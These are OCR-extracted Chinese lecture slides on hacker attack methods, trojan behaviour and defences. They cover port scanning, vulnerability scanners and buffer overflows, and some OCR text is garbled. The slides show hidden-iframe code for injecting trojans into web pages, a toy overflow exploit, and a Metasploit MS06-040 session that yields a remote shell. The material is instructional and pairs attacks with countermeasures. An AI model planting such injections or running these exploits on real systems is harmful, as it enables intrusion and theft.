黑客攻击与防范技术2黑客攻击引起的网络安全异常状态诊断3

黑客攻击引起的网络安全异常

状态诊断

崔宝江副教授博导

北京邮电大学计算机学院

cui_bj@

北邮•信息安全中心•崔宝江

目录

主机被木马远程控制的现象

二.黑客攻击基本流程

三.黑客常见攻击方法和防范措施

四.结束语

北邮•信息安全中心•崔宝江

主机被木马远程控制的现象

I

□现象1：QQ、MSN的异常登录提醒，你在登录

QQ时，系统提示上一次的登录IP利你完全不

相干。比如，你明明就只在上海的家里上过，

QQ却提醒你上一次登录地点在沈阳。

□现象2：网络游戏登录时发现装备丢失或和你

上次下线时的位置不符，甚至用正确的密码无

法登录。

□现象3：有时会突然发现你的鼠标不听使唤，

在你不动鼠标的时候，鼠标也会移动，并且还

会点击有关按钮进行操作。

北邮•信息安全中心•崔宝江

主机被木马远程控制的现象

口现象4：正常上网时，突然感觉很慢，硬盘灯

在闪烁，就象你平时在COPY文件。

□现象5：当你准备使用摄像头时，系统提示，

该设备正在使用中。

口现象6：在你没有使用网络资源时，你发现网

卡灯在不停闪烁。如果你设定为连接后显示状

态，你还会发现屏幕右下角的网卡图标在闪。

北邮•信息安全中心•崔宝江

木马概述

1特洛伊木马程序可以直接侵入用户的电脑并进

行破坏，它常被伪装成工具程序或者游戏等诱使用

户打开带有木马程序的邮件附件或从网上直接下载

,一旦用户打开了这些邮件的附件或者执行了这些

程序之后，它们就会在计算机系统中隐藏一个可以

在启动时悄悄执行的程序。这种远程控制工具可以

完全控制受害主机，危害极大。

WindowsT：

Netbus>subseven、BO、冰河、网络神偷等

UNIX下：

Rhost++>Login后|】、rootkit等北邮•信息安全中心•代

木马组成

L对木马程序而言，它一般包括两个部分：客户端和服务器

上山

“而。

•服务器端安装在被控制的计算机中，它一般通过电子邮件

或其他手段让用户在其计算机中运行，以达到控制该用户

计算机的目的。

•客户端程序是控制者所使用的，用于对受控的计算机进行

控制。服务器端程序和客户端程序建立起连接就可以实现

对远程计算机的控制了。

•木马运行时，首先服务器端程序获得本地计算机的最高操

作权限，当本地计算机连入网络后，客户端程序可以与服

务器端程序直接建立起连接，并可以向服务器端程序发送

各种基本的操作请求，并由服务器端程序完成这些请求，

也就实现对本地计算机的控制了。北邮.信息安全中心.崔宝江为

•木马本身不具备繁殖性和自动感染的功能。」

q木马分类

・远程访问型木马是现在最广泛的特洛伊木马，它可以访问受害人的硬

盘，并对其进行控制。这种木马用起来非常简单，只要某用户运行一下服

务端程序，并获取该用户的IP地址，就可以访问该用户的计算机。这种木

马可以使远程控制者在本地机器上做任意的事情，比如键盘记录、上传和

下载功能、截取屏幕等等。这种类型的木马有著名的BO(BackOffice)

和国产的冰河等。

•密码发送型木马的目的是找到所有的隐藏密码，并且在受害者不知道的

情况下把它们发送到指定的信箱。大多数这类的木马不会在每次的

Windows重启时重启，而且它们大多数使用25端口发送E-mail。

•键盘记录型木马非常简单的，它们只做一种事情，就是记录受害者的键

盘敲击，并且在LOG文件里做完整的记录。这种特洛伊木马随着

Windows的启动而启动，知道受害者在线并且记录每一件事。

•毁坏型木马的唯一功能是毁坏并且删除文件。这使它们非常简单，并且

很容易被使用。它们可以自动地删除用户计算机上的所有的.DLL、INI或

EXE文件。

•FTP型木马打开用户计算机的21端口(FTP所使用的默认端口)，像等

一个人都可以用一个FTP客户端程序来不用密朝建则谈评算机承前减

可以进行最高权限的上传下载。

木马分类

f二代木马

□冰河、广外女生

•第三代木马

口灰鸽子

。反弹端口技术

•第四代木马

□广外幽灵、广外男生

。线程插入

•第五代木马

口进程、端口、文件、注册表隐藏

北邮•信息安全中心•崔宝江

第3代木马一反弹端口木马1

连接请求

攻击者http

ClientServer

黑客用户

北邮•信息安全中心•崔宝江

Web/ftp服务器北邮•信息安全中心•崔宝江

第4代木马一线程插入

»系统/应用程序gwboy.dll

昌Vindovs任务管理器

文件3）选项查看9帮助QP

联网

用

映像名称户名

jfxc.had.exe

TINTSETP.EXE36oog

msinfo32exe3924

msinn.exe3968oo12,

TPHKMGR.exe3892oo2,

37oo

Foxn&il.ex«923,，

TpScrex.exe3476oo叩

retlsched.«x«3420

explorer.exe34360133,

agentsvrexe3392005,

32

WINWORD.EXE56005,

32

SysSafe.exe36005,

31笫002,1

taslongr.exe4000

ctfmon.este56

29006,

coniine.exe284400

PGPtray.exe280000

igfxtray.exe

□显示所有用户的进程堪）|结束进程豆）〕

进程数：53CPU使用：律提交更改：45毓/1857M

共山"信息安全中心.崔宝江

第5代木马一进程隐藏

北邮•信息安全中心•崔宝江

第5代木马一无端口木马

临时端口7000

服务端

木马会选择一些常用的端口，如80、23,有些非常先进的木马还可

以做到在占领HTTP(80)端口后，收到正常的HTTP请求仍然把它交

与Web服务器处理，只有收到一些特殊约定的数据包后，才调用木

马程序。

北邮•信息安全中心•崔宝江

木马演示

•木马演示

北邮•信息安全中心•崔宝江

TCP/IP协议簇

TCP三次握手机制

主机A：客户端主机B：服务端

o自

发送TCPSYN分段

1)(seq=100ctl=SYN)

SYNreceived

发送TCPSYN&ACK分段

SYNreceived(seq=300ack=101ctl=syn,ack)

Established

少(seq=101ack=301ctl=ack：

北邮•信息安全中心•崔宝江

32bit

816

IIIIIIIIIII

源端口目的端口

序号

20字节的

TCP确认号固定首部

首部FWAP

保留CS窗口

偏移H

检验和紧急指针

选项（长度可变）填充

TCP报文段TCP首部TCP数据部分

发送在前1

IP首部IP数据部分V

北邮•信息安全中心•崔宝江

TCP/IP相关问题

一个TCP头包含6个标志位。它们的意义如下所

述：

SYN:标志位用来建立连接，让连接双方同步序列号。如果SYN=1而ACK=O,则表示该

数据包为连接请求，如果SYN=1而ACK=1则表示接受连接；

FIN:表示发送端已经没有数据要求传输了，希望释放连接；

RST:用来复位一个连接。RST标志置位的数据包称为复位包。一般情况下，如果TCP收

到的一个分段明显不是属于该主机上的任何一个连接，则向远端发送一个复位包；

URG:为紧急数据标志。如果它为1,表示本数据包中包含紧急数据。此时紧急数据指针

有效；

ACK:为确认标志位。如果为1,表示包中的确认号时有效的。否则，包中的确认号无

效；

P骷％相搀%，聋爵趣跋嘏驶绒”懒碑。北邮.信息安全中心,崔宝江⑤)

端口扫描基础

:匕叫'•侣是女生甲心至玉江飞

TCP三次握手机制

主机A：客户端主机B：服务端

o自

发送TCPSYN分段

1)(seq=100ctl=SYN)

SYNreceived

发送TCPSYN&ACK分段

SYNreceived(seq=300ack=101ctl=syn,ack)

Established

少(seq=101ack=301ctl=ack：

北邮•信息安全中心•崔宝江

问题

•黑客如何入侵？

•我们如何能够检测出来?

北邮•信息安全中心•崔宝江

目录

—.主机被控的现象

黑客攻击基本流程

三.黑客常见攻击方法和防范措施

四.结束语

北邮♦信息安全中心♦崔宝江

二.黑客攻击基本流程

二黑客攻击基本流程

口诱骗式攻击

口主动定点攻击

北邮•信息安全中心•崔宝江

二.黑客攻击基本流程

』-

・二.黑客攻击基本流程

口诱骗式攻击

。诱骗打开网站或者点击网站链接

。诱骗从网站下载文件

。诱骗打开电子邮件附件或者页面中的隐藏链接

。诱骗打开QQ、MSN发来的文件或者链接

。通过网络或者U盘等介质感染病毒

网

北邮•信息安全中心•崔宝江

二.黑客攻击基本流程

•网页挂马

口在网页代码中加入隐蔽的框架

。框架的代码如下：

O<iframesrc=地址width=Oheight=Ox/iframe>

。其中“地址”就是木马所在的远程地址，"width=O

height=O”意味着该框架为不可视的，用户就很难

发现木马的运行。

北邮•信息安全中心•崔宝江

二.黑客攻击基本流程

•网页挂马

□通过Html文件的body标记进行挂马

Otop.document.body.innerHTML=

top.document.body.innerHTML+V\n<iframe

src=地址width=,0,height=,O,x/iframe>,;

北邮•信息安全中心•崔宝江

二.黑客攻击基本流程

•网页挂马

□伪装挂马：在某些特定的位置嵌入木马的运

行代码

O图片伪装：在图片打开之前，执行了一个写有木

马地址的框架。

<html>

<iframesrc="网马地址"height=Owidth=0x/iframe>

<imgsrc="图片地址”>v/center>

</html>

北邮•信息安全中心•崔宝江

二,黑客攻击基本流程

•捆绑式欺骗

口将木马利目标文件进行捆绑后形成一个具有迷

惑性的文件

北邮•信息安全中心•崔宝江

二.黑客攻击基本流程

二黑客攻击基本流程

口诱骗式攻击

口主动定点攻击

北邮•信息安全中心•崔宝江

主动定点攻击步骤

预攻击探测

t收集信息，如OS类型,提供的服务端口

发现漏洞,采取攻击行为

t破解口令文件，或利用缓存溢出漏洞

获得攻击目标的控制权系统

t获得系统帐号权限，并提升为root权限

安装系统后门

t方便以后使用

继续渗透网络，直至获取机密数据

t以此主机为跳板，寻找其它主机的漏洞

消灭踪迹北邮•信息安全中心•崔宝江

消除所有入侵脚印，以免我誉理负蓑觉J

目录

—.主机被控的现象

二.黑客攻击基本流程

三.黑客常见攻击方法和防范措施

四.结束语

北邮♦信息安全中心♦崔宝江

三.黑客常见攻击方法和防范措施

1.网络与主机的漏洞扫描和攻击

2.缓冲区溢出攻击

3.SQL注入攻击

4.口令破解和嗅探

5.拒绝服务攻击

6.ARP欺骗

北邮•信息安全中心•崔宝江

端口扫描基础

•扫描原理

□1）全TCP连接

□2）SYN扫描（半打开式扫描）

O发送SYN,远端端口开放,则回应SYN=1,ACK=1，本地发送RST给远端,

拒绝连接

。发送SYN,远端端口未开放，回应RST

□3）FIN扫描（秘密扫描）

。本地发送FIN=1,远端端口开放，丢弃此包，不回应

。本地发送FIN=1,远端端口未开放，返回一个RST包

北邮•信息安全中心•崔宝江

TCP三次握手机制

主机A：客户端主机B：服务端

o自

发送TCPSYN分段

1)(seq=100ctl=SYN)

SYNreceived

发送TCPSYN&ACK分段

SYNreceived(seq=300ack=101ctl=syn,ack)

Established

少(seq=101ack=301ctl=ack：

北邮•信息安全中心•崔宝江

全TCP连接

”期以来TCP端口扫描的基础

□扫描主机尝试（使用三次握手）与目的机指定端口建

立建立正规的连接

•连接由系统调用connect。开始

口对于每一个监听端口，connect。会获得成功，否则返

回一1,表示端口不可访问

•很容易被检测出来

□Courtney,Gabriel和TCPWrapper监测程序通常用来进

行监测。另外，TCPWrapper可以对连接请求进行控

制，所以它可以用来阻止来自不明主机的全连接扫描

北邮•信息安全中心•崔宝江

TCPSYN扫描

北邮•信息安全中心•崔宝江

]/r~

TCPFIN扫描

北邮•信息安全中心•崔宝江

端口扫描基础

•利用TCP/IP来识别不同的操作系统和服务

•向系统发送各种特殊的包，根据系统对包

回应的差别，推断出操作系统的种类

•端口扫描程序利用的部分特征

口ICMP错误信息抑制

口服务类型值(TOS)

口TCP/IP选项

□对SYNFLOOD的抵抗力

口TCP初始窗口

北邮•信息安全中心•崔宝江

高级扫描技术-慢速扫描

A如果扫描是对非连续性端口、源地址不一致、时

间间隔很长且没有规律的扫描的话，这些扫描的

记录就会淹没在其他众多杂乱的日志内容中

＞使用慢速扫描的目的就是骗过防火墙和入侵检测

系统而收集信息。虽然扫描所用的时间较长，但

是这是一种较难发现的扫描

北邮•信息安全中心•崔宝江

高级扫描技术-乱序扫描

A普通的扫描器在扫描远程系统的端口时，对端口

扫描的顺序是有序的，这种按照一定的顺序扫描

端口的方式很容易被入侵检测系统发觉。

A乱序扫描的端口号的顺序是随机生产的，这种方

式能有效的欺骗某些入侵检测系统而不会被入侵

检测系统发觉

[■端口扫描工具（Windows平台）

工

>SuperScan

>Nmap

网

北邮•信息安全中心•崔宝江

端口扫描工具：SuperScan

。SuperScan3.00

Jd

IPTimeoutScantypeScan

pinging

Stag01Q10.155-2JPingrResolvehostnames

|400Onlyscanresponsiveping$00

Stop|00

ShowhoslresponsesScannim

PrevC|Nextc|1..254|Connect：发Pingonly10.10,10155

[2000~

rEveryportinlistResolving

“IgnoreIPzeroAllselectedportsinlist

Read

BIgnoreIP255Alllistportsfrom655#：

|400(f

FExtractfromfile「「

AllportsfromI46S535

Speed

Maxay55Activehosts

B•21FileTransferProtocol[Control]

E*3220IsMicrosoftFTPService(Version50)…500"：commandnotunderstcOpenports

日•25SimpleMailTransfer3

画

220IsMicrosoftESMTPMAILService,Version:5.0.2172.1readyatTueSave

日•「而WohdWideWei用背隹

&HTTM.i302Objectmoved.Server:Microwft-IISZ5.0..Date:Tue,22JJCollapseall

Expandall

±]Prune

端口扫描工具：NmapNT

北邮•信息安全中心•崔宝江

针对预攻击探测的防范措施

•Pingsweep

安装防火墙或相关工具软件，禁止某些ICMPping,使用

NAT隐臧内部网络结构

Portscan

安装防火墙或相关工具软件，禁止访问不该访问的服务端口

OSfingerprint

安装防火墙或相关工具软件，只允许访问少量服务端口，由

于攻击者缺乏必要的信息，无法判断OS类型

资源和用户扫描

防范NetBIOS扫描的最直接方法就是不允许对TCP/UDP135

到139端口的访问，如通过防火墙或路由器的配置等。另外，

对单独的主机，可使用NetBIOSoverTCP/IP项失效或注册表

配置来实现。

北邮•信息安全中心•崔宝江

漏洞扫描和攻击概述

漏洞扫描是一种最常见的攻击模式

,用于探测系统和网络漏洞，如获取系

统和应用口令，嗅探敏感信息，利用缓

存区溢出直接攻击等。

针对某一类型的漏洞，都有专门的

攻击工具。另外，也有一些功能强大综

合扫描工具，针对系统进行全面探测和

漏洞扫描，如流光等。

北邮•信息安全中心•崔宝江g

I综合扫描

I安全扫描审计;

口分类

。网络安全扫描

。系统安全扫描

口优点

。较全面检测流行漏洞

。降低安全审计人员的劳动强度

。防止最严重的安全问题

口缺点

。无法跟上安全技术的发展速度

。只能提供报告，无法实际解决

O可能出现漏报和误报

北邮•信息安全中心•崔宝江

漏洞利用周期图表

入侵者采用公自动扫描安全

布的攻击代码漏洞工具发布

简陋的漏洞

自动扫描安全漏入侵者着眼

攻击代码发布洞工具广泛流传

新的漏洞

资深黑客

发现漏洞

3

北邮•信息安全中心•崔宝江

综合扫描器的使用

漏洞描述与解决方法

■皿可耽仝绢a知瑞

所。的，“甫做出可以以典।色趣•小，

双击*amt嘱SMBH力9蛆只名被即从再Hfl入U尿“%

RSASNSF0CV8®触保期奸！MfcUMfBLl电：

•般共*，都期:

麻力室

,确火埴上seM睢制a共N务的访利：

•嫌■足幅愉口叙

北邮•信息安全中心•崔宝江

哪些方面对系统进行安全评估

为堵死安全策略和安全措施之间的缺口,必须从

以下三方面对网络安全状况进行评估：

从企业外部进行评估:考察企业计算机基础设

施中的防火墙;

从企业内部进行评估:考察内部网络系统中的

计算机;

从应用系统进行评估:考察每台硬件设备上运

行的操作系统。

北邮•信息安全中心•崔宝江

综合扫描和攻击工具演示

•流光

•X-Scan

•SSS

•Nessus

北邮•信息安全中心•崔宝江

漏洞攻击的防范措施

•安装防火墙，禁止访问不该访问的服务端口，使用

NAT隐藏内部网络结构

•安装入侵检测系统，检测漏洞攻击行为

•安装安全评估系统，先于入侵者进行模拟漏洞攻击,

以便及早发现漏洞并解决

•提高安全意识，经常给操作系统和应用软件打补丁

北邮•信息安全中心•崔宝江

三.黑客常见攻击方法和防范措施

1.网络与主机的漏洞扫描和攻击

2,缓冲区溢出攻击

3.SQL注入攻击

4.口令破解和嗅探

5.拒绝服务攻击

6.ARP欺骗

北邮•信息安全中心•崔宝江

缓冲区溢出攻击

十年来最大的安全问题

这是一种系统攻击手段，通过向程序的缓冲区

写超出其长度的内容，造成缓冲区的溢出，从而

破坏程序的堆栈，使程序转而执行其它指令，以

达到攻击的目的。这种攻击可以使得一个匿名的

Internet用户有机会获得一台主机的部分或全部

的控制权。

北邮•信息安全中心•崔宝江

缓冲区溢出基本原理

受攻击程序vulnerable.c

voidmain(intargc,char^argv[])

charbuff[1024];

if(argc>1)

strcpy(buff,argv[l]);

北邮•信息安全中心•崔宝江

缓冲区溢出基本原理

攻击程序exploit,c

#include<stdio.h>

#include<unistd.h>

voidmain(){

charstring[2000];

for(i=0;i<2000;i++)string[i]='A';

execl(''./vulnerable“Jvulnerable''string,0);

北邮•信息安全中心•崔宝江

缓冲区溢出基本原理

Vulnerable.cmain（）函数的堆栈情况

buff和]（栈顶）buff^[AAAA]（栈顶）

[……]

[AAAA]

[其他寄存器值][AAAA]

[ebp][AAAA]^ebp

[ret][AAAA]-ret

北邮•信息安全中心•崔宝江

AvailableExploits(8)Baa

SEARCH06_040

Matched1modulesforterm06040

MicrosoftServerServiceNetpwPathCanonicalizeOverflow

ThismoduleexploitsastackoverflowintheNetApi32CanonicalizePathName()functionusingthe

NetpwPathCanonicalizeRPCcallintheServerServiceItislikelythatotherRPCcallscouldbeusedto

exploitthisservice.ThisexploitwillresultinadenialofserviceononWindowsXPSP2orWindows

2003SP1.AfailedexploitattemptwilllikelyresultinacompleterebootonWindows2000andthe

terminationofallSfvIB-relatedservicesonWindowsXPThedefaulttargetforthisexploitshould

succeedonWindowsNT4.0.Windows2000SP0-SP4*WindowsXPSP0-SP1andWindows2003

SP0.

完成&<

OMetasplatFrame...里坤©10:27

Rit¥7而翼i胃、y笳i|函工侬fjj

文件㈤端辑（f）查看历史⑸书签回TM（I）朝助省）

■http:〃:55555/GO@tGoogle

■新手上路・最新头条

•Disable〜JkCookies*■CSS*■Forms*■Images*SInformation*•Msceianeous〜Outfine*JJResize*Tools*OViewSource*Options*

嗓ExploitsAuxilianes•Payloads.ConsoleSessions妙About

MicrosoftServerServiceNetpwPathCanonicalizeOverflow(10)EJBE3

ThismoduleexploitsastackoverflowintheNetApi32CanonicalizePathName()functionusingthe

NetpwPathCanonicalizeRPCcallintheServerServiceItislikelythatotherRPCcallscouldbe

usedtoexploitthisserviceThisexploitwillresultinadenialofserviceononWindowsXPSP2or

Windows2003SP1AfailedexploitattemptwilllikelyresultinacompleterebootonWindows2000

andtheterminationofallSMB-relatedservicesonWindowsXPThedefaulttargetforthisexploit

shouldsucceedonWindowsNT40Windows2000SP0-SP4+WindowsXPSP0-SP1and

Windows2003SP0.

Thismodule(v4532)wasprovidedbyhdmundertheMetasploitFrameworkLicense

Selectatargettocontinue:

o(wcscpy)Automatic(NT4.0,2000SP0-SP4.XPSP0-SP1)

o(wcscpy)WindowsNT4.0IWindows2000SP0SP4

o(wcscpy)WindowsXPSP0/SP1

0(stack)WindowsXPSP1English

o(stack)WindowsXPSP1Italian

o(wcscpq)Windows2003SP0

戚若阳|*击4aO■MetasplatFrame...里坤©10:27

Rit¥7而翼i胃、y笳i|函工侬fjj

文件㈤端辑（f）查看历史⑸书签回TM（I）朝助省）

■http:〃:55555/GO@tGoogle

■新手上路・最新头条

•Disable〜JkCookies*■CSS*■Forms*■Images*SInformation*•Msceianeous〜Outfine*JJResize*Tools*OViewSource*Options*

嗓ExploitsAuxilianes•Payloads.ConsoleSessions妙About

OMetasplatFrame...里坤©10:27

或幅附泡w彷门”?了:因】，笺依■野酎,南仔启口荏户

nmraaYd11Au

文件（£）编梅3登看（？）历史⑸书签坦）TM（T）帮助出）・・・

■▼二'QC.'http:〃:55555/C3OBLGoogle

■新手上路照最新头条

0Disable*ACookies*■CSS*■Forms*HImages*SInformation*•Miscdteneou5y/Outfne~J*Resize*Toot*flViewSource*Options*

IEIHQ

WelcometotheMetasploitWebConsole!

)/1/一)\lI

III((//Il_((II_IIIIII

./III-/

=[msfv3.0

+——=[176exploits-104payloads

+——=L17encoders-bnops

=[30aux

Startedreversehandler

DetectedaWindows2000target

Bindingto4b324fc8-1670-01d3-1278-5a47bf6eel88:3.0@ncacn_np:01[\BROWSER]

Boundto4b324fc8-1670-01d3-1278-5a47bf6eel88:3.0@ncacn_np:01[\BROWSER]...

Buildingthestubdata...

Callingthevulnerablefunction...

Commandshellsession1opened(10:4444->01:1061)

MicrosoftWindows2000[Version5.00.2195]

(C)Copyright1985-2000MicrosoftCorp.

C:\WINNT\system32>

(running)

III

完成&

矽MetasploitFramewor...一国3

A出高i¥闺/席值的7K；］iVJEillHl-①

文件（E）编物但查看区）历史⑸书签回工具①稽助电）址

4.“©C.■http:〃:55555/(30BLGoogle

新手上路・最新头条

•Disable~4^Cookies*■CSS*■Forms*■Images**Information**Miscellaneous*XOutline*J*Resee*/Tools'-ViewSource*Options*

MetasoloitExploit(11)QHQ

1469File(s)198,627,441bytes

28Dir(s)3,218,411,520bytesfree

C:\WINNT\system32>

»dirc:\/a

dirc:\/a

VolumeindriveChasnolabel.

VolumeSerialNumberis0081-F487

Directoryofc:\

08/27/200710:01p27123.txt

06/19/200306:05p150,528arcldr.exe

06/19/200306:05p163,840arcsetup.exe

08/15/200709:59p0AUTOEXEC.BAT

08/15/200709:53p192boot.ini

08/15/200709:59p0CONFIG.SYS

09/01/200704:26a<DIR>DocumentsandSettings

08/15/200709:59p0IO.SYS

08/15/2007